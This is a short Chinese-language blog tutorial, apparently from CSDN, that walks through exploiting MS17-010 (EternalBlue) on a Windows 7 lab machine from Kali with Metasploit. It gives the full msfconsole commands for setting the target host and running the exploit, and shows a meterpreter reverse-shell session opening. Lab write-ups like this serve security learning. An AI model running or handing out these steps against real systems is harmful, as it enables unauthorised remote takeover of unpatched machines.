1.準備環境win7操作系統(被攻擊機)以及kali系統(攻擊機),kali使用msf工具進行攻擊。
2.打開kali終端,進入msf,輸入msfconsole然后等待啟動。
┌──(root?kali-chifan)-[~]
└─# msfconsole
?3.搜索漏洞遠程攻擊MS17-010漏洞。
msf6 > search MS17-010
?4.搜索到這個漏洞,使用use命令,使用這個漏洞。
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
5.查信息,使用info命令查看相關信息,查看如何使用這個腳本。
msf6 >info
6.根據剛剛查詢的信息設置所需參數參數 ,現在是已經進入使用這個漏洞,required提示yes的地方需要設置對應參數。
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.101
rhosts => 192.168.0.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 1
target => 1
?7.開始運行。發現攻擊成功。
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
.......
meterpreter > sysinfo
Computer : ADMIN-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
?8.至此結束,寫的不算是太詳細,但是流程跟我上一篇類似,可以作為參考。可以參考這個漏洞實操MS08-067漏洞攻擊遠程控制win2003系統詳細簡單-CSDN博客。如果你也感興趣可以點個關注支持一下。